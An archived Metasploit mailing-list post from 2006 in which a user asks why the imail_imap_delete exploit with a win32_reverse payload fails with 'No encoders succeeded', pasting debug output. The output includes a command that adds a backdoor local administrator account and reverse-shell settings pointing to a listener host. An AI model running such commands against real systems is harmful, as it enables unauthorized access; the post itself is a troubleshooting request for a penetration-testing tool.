Metasploit mailing list archives

FW: Getting "Error: No encoders succeeded" when trying to run imail_imap_delete(win32_reverse)


From: joewhite at cisco.com (Joe White (joewhite))
Date: Thu, 26 Oct 2006 19:32:48 -0700

I'm running Metasploit 2.6 with Linux.  I've run several tests
successfully, but I can't get this one to run :
Here's the DebugLevel=5 output: 
 
msf debug(win32_reverse) > exploit
AutoOpts setting EXITFUNC -> thread
AutoOpts setting GETPCTYPE -> edx
cmd_unix_reverse_nss failed, didn't match OS
linux_ia32_bind_stg failed, didn't match OS
cmd_localshell failed key check
bsd_sparc_reverse failed, didn't match OS
Payload: searching for opt=EXITFUNC type=V
Win32Payload: returning Size of 435
Win32Payload: size on
Msf::Payload::win32_passivex_vncinject=HASH(0xa4240e8)
bsdi_ia32_reverse_stg failed, didn't match OS
linux_ia32_reverse_impurity failed, didn't match OS
cmd_generic failed key check
bsdi_ia32_bind_stg failed, didn't match OS
osx_ppc_reverse_nf_stg failed, didn't match OS
osx_ppc_reverse failed, didn't match OS
WinExec CMD: cmd.exe /c net user fwuser welcome /ADD && net localgroup
Administrators fwuser /ADD
Payload: searching for opt=EXITFUNC type=V
Win32Payload: returning Size of 214
Win32Payload: size on Msf::Payload::win32_adduser=HASH(0xa6c8fc0)
Payload: searching for opt=LPORT type=n
Payload: replacing opt=LPORT type=n value=4444
Win32Payload: returning Size of 287
Win32Payload: size on
Msf::Payload::win32_bind_meterpreter=HASH(0xa52f1e0)
linux_ia32_adduser failed, didn't match OS
Payload: searching for opt=LPORT type=n
Payload: replacing opt=LPORT type=n value=4444
Win32Payload: returning Size of 287
Win32Payload: size on Msf::Payload::win32_bind_dllinject=HASH(0xa5b4270)
Payload: searching for opt=EXITFUNC type=V
Payload: searching for opt=LHOST type=ADDR
Payload: replacing opt=LHOST type=ADDR value=192.168.8.116
Payload: searching for opt=LPORT type=n
Payload: replacing opt=LPORT type=n value=4321
Win32Payload: returning Size of 287
Win32Payload: size on Msf::Payload::win32_reverse=HASH(0xa59f0d8)
linux_sparc_findsock failed, didn't match OS
linux_ia32_findrecv_stg failed, didn't match OS
Payload: searching for opt=LHOST type=ADDR
Payload: replacing opt=LHOST type=ADDR value=192.168.8.116
Payload: searching for opt=LPORT type=n
Payload: replacing opt=LPORT type=n value=4321
Win32Payload: returning Size of 269
Win32Payload: size on Msf::Payload::win32_reverse_stg=HASH(0xa57de9c)
Payload: searching for opt=LHOST type=ADDR
Payload: replacing opt=LHOST type=ADDR value=192.168.8.116
Payload: searching for opt=LPORT type=n
Payload: replacing opt=LPORT type=n value=4321
Win32Payload: returning Size of 269
Win32Payload: size on
Msf::Payload::win32_reverse_dllinject=HASH(0xa537e60)
linux_ia32_bind failed, didn't match OS
cmd_interact failed, didn't match OS
Payload: searching for opt=EXITFUNC type=V
Win32Payload: returning Size of 435
Win32Payload: size on
Msf::Payload::win32_passivex_meterpreter=HASH(0xa327660)
bsdi_ia32_reverse failed, didn't match OS
linux_ia32_reverse failed, didn't match OS
Payload: searching for opt=EXITFUNC type=V
Payload: searching for opt=LPORT type=n
Payload: replacing opt=LPORT type=n value=4444
Win32Payload: returning Size of 317
Win32Payload: size on Msf::Payload::win32_bind=HASH(0xa5fde88)
linux_ia32_exec failed, didn't match OS
bsd_sparc_bind failed, didn't match OS
Payload: searching for opt=LHOST type=ADDR
Payload: replacing opt=LHOST type=ADDR value=192.168.8.116
Payload: searching for opt=LPORT type=n
Payload: replacing opt=LPORT type=n value=4321
Win32Payload: returning Size of 269
Win32Payload: size on
Msf::Payload::win32_reverse_stg_upexec=HASH(0xa4bdd10)
cmd_irix_bind failed, didn't match OS
cmd_sol_bind failed, didn't match OS
bsd_ia32_bind failed, didn't match OS
win32_findrecv_ord_meterpreter failed key check
win32_findrecv_ord_vncinject failed key check
bsd_ia32_bind_stg failed, didn't match OS
osx_ppc_bind failed, didn't match OS
Payload: searching for opt=LHOST type=ADDR
Payload: replacing opt=LHOST type=ADDR value=192.168.8.116
Payload: searching for opt=LPORT type=n
Payload: replacing opt=LPORT type=n value=4321
Win32Payload: returning Size of 269
Win32Payload: size on
Msf::Payload::win32_reverse_vncinject=HASH(0xa6f634c)
cmd_unix_reverse_bash failed, didn't match OS
bsd_ia32_reverse_stg failed, didn't match OS
Payload: searching for opt=LPORT type=n
Payload: replacing opt=LPORT type=n value=4444
Win32Payload: returning Size of 287
Win32Payload: size on
Msf::Payload::win32_bind_stg_upexec=HASH(0xa5dab20)
solaris_ia32_bind failed, didn't match OS
linux_sparc_reverse failed, didn't match OS
osx_ppc_reverse_stg failed, didn't match OS
Payload: searching for opt=LHOST type=ADDR
Payload: replacing opt=LHOST type=ADDR value=192.168.8.116
Payload: searching for opt=LPORT type=n
Payload: replacing opt=LPORT type=n value=4321
Win32Payload: returning Size of 269
Win32Payload: size on
Msf::Payload::win32_reverse_meterpreter=HASH(0xa551034)
linux_ia32_reverse_stg failed, didn't match OS
WinExec CMD: 
Payload: searching for opt=EXITFUNC type=V
Win32Payload: returning Size of 130
Win32Payload: size on Msf::Payload::win32_exec=HASH(0xa465738)
solaris_sparc_bind failed, didn't match OS
irix_mips_execve failed, didn't match OS
win32_findrecv_ord_stg failed key check
linux_ia32_findsock failed, didn't match OS
win32_reverse_ord failed key check
solaris_ia32_reverse failed, didn't match OS
win32_reverse_ord_vncinject failed key check
Payload: searching for opt=LPORT type=n
Payload: replacing opt=LPORT type=n value=4444
Win32Payload: returning Size of 287
Win32Payload: size on Msf::Payload::win32_bind_vncinject=HASH(0xa44e6bc)
bsdi_ia32_findsock failed, didn't match OS
bsd_ia32_reverse failed, didn't match OS
Payload: searching for opt=LPORT type=n
Payload: replacing opt=LPORT type=n value=4444
Win32Payload: returning Size of 287
Win32Payload: size on Msf::Payload::win32_bind_stg=HASH(0xa5fddb0)
Payload: searching for opt=EXITFUNC type=V
Win32Payload: returning Size of 435
Win32Payload: size on Msf::Payload::win32_passivex_stg=HASH(0xa5a09c4)
Payload: searching for opt=EXITFUNC type=V
Win32Payload: returning Size of 435
Win32Payload: size on Msf::Payload::win32_passivex=HASH(0xa492c78)
cmd_unix_reverse failed, didn't match OS
bsd_ia32_findsock failed, didn't match OS
bsd_ia32_findrecv_stg failed, didn't match OS
linux_sparc_bind failed, didn't match OS
generic_sparc_execve failed, didn't match OS
osx_ppc_bind_stg failed, didn't match OS
linux_ia32_findrecv failed, didn't match OS
solaris_sparc_findsock failed, didn't match OS
bsdi_ia32_bind failed, didn't match OS
solaris_sparc_reverse failed, didn't match OS
solaris_ia32_findsock failed, didn't match OS
bsd_ia32_findrecv failed, didn't match OS
osx_ia32_bind failed, didn't match OS
linux_ia32_reverse_udp failed, didn't match OS
osx_ppc_findrecv_stg failed, didn't match OS
bsd_ia32_exec failed, didn't match OS
Trying encoder Msf::Encoder::PexFnstenvMov
PexFnstenvMov encoder failed key check
Trying encoder Msf::Encoder::PexFnstenvSub
PexFnstenvSub encoder failed key check
Trying encoder Msf::Encoder::Countdown
Countdown encoder failed key check
Trying encoder Msf::Encoder::Pex
Pex encoder failed key check
Trying encoder Msf::Encoder::None
None encoder failed key check
Trying encoder Msf::Encoder::OSXPPCLongXORTag
Msf::Encoder::OSXPPCLongXORTag failed, doesn't support all architectures
payloadArch: x86
encoderArch: ppc
Trying encoder Msf::Encoder::PexAlphaNum
Payload: searching for opt=EXITFUNC type=V
Payload: searching for opt=LHOST type=ADDR
Payload: replacing opt=LHOST type=ADDR value=192.168.8.116
Payload: searching for opt=LPORT type=n
Payload: replacing opt=LPORT type=n value=4321
Msf::Encoder::PexAlphaNum failed, encoded payload too large for exploit
ExploitSpace: 614
EncodedLength: 661
MinNops: 0 MaxNops: 0
Trying encoder Msf::Encoder::JmpCallAdditive
JmpCallAdditive encoder failed key check
Trying encoder Msf::Encoder::Sparc
Msf::Encoder::Sparc failed, doesn't support all architectures
payloadArch: x86
encoderArch: sparc
Trying encoder Msf::Encoder::ShikataGaNai
ShikataGaNai encoder failed key check
Trying encoder Msf::Encoder::Alpha2
Payload: searching for opt=EXITFUNC type=V
Payload: searching for opt=LHOST type=ADDR
Payload: replacing opt=LHOST type=ADDR value=192.168.8.116
Payload: searching for opt=LPORT type=n
Payload: replacing opt=LPORT type=n value=4321
Trying mixed
Msf::Encoder::Alpha2 failed, encoded payload too large for exploit
ExploitSpace: 614
EncodedLength: 648
MinNops: 0 MaxNops: 0
Trying encoder Msf::Encoder::OSXPPCLongXOR
Msf::Encoder::OSXPPCLongXOR failed, doesn't support all architectures
payloadArch: x86
encoderArch: ppc
Trying encoder Msf::Encoder::QuackQuack
Msf::Encoder::QuackQuack failed, doesn't support all architectures
payloadArch: x86
encoderArch: ppc
Error: No encoders succeeded
msf debug(win32_reverse) > 
 
 Any suggestions on how I might proceed?
 
thanks
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://mail.metasploit.com/pipermail/framework/attachments/20061026/c11619cf/attachment.htm>


Current thread: